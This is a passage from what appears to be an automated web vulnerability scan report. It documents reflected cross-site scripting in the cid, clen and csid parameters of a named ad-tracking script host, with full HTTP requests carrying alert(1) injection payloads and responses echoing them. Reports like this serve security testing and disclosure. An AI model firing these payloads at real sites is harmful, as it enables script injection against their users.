Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:48 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:48 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627fe30b';alert(1)//803e9c23130');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();

4.123. http://js.revsci.net/gateway/gw.js [clen parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the clen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31fab'%3balert(1)//0fad37552c8 was submitted in the clen parameter. This input was echoed as 31fab';alert(1)//0fad37552c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=32831fab'%3balert(1)//0fad37552c8&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:35 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:35 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:34 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
csid);
if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','32831fab';alert(1)//0fad37552c8');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '332902
...[SNIP]...

4.124. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 7ec98<script>alert(1)</script>b1efe77bc87 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?auto=t&csid=A108687ec98<script>alert(1)</script>b1efe77bc87&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:29 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:29 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:29 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "A108687EC98<SCRIPT>ALERT(1)</SCRIPT>B1EFE77BC87" was not recognized.
*/

4.125. http://js.revsci.net/gateway/gw.js [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the p request parameter is copied into a JavaScript string which i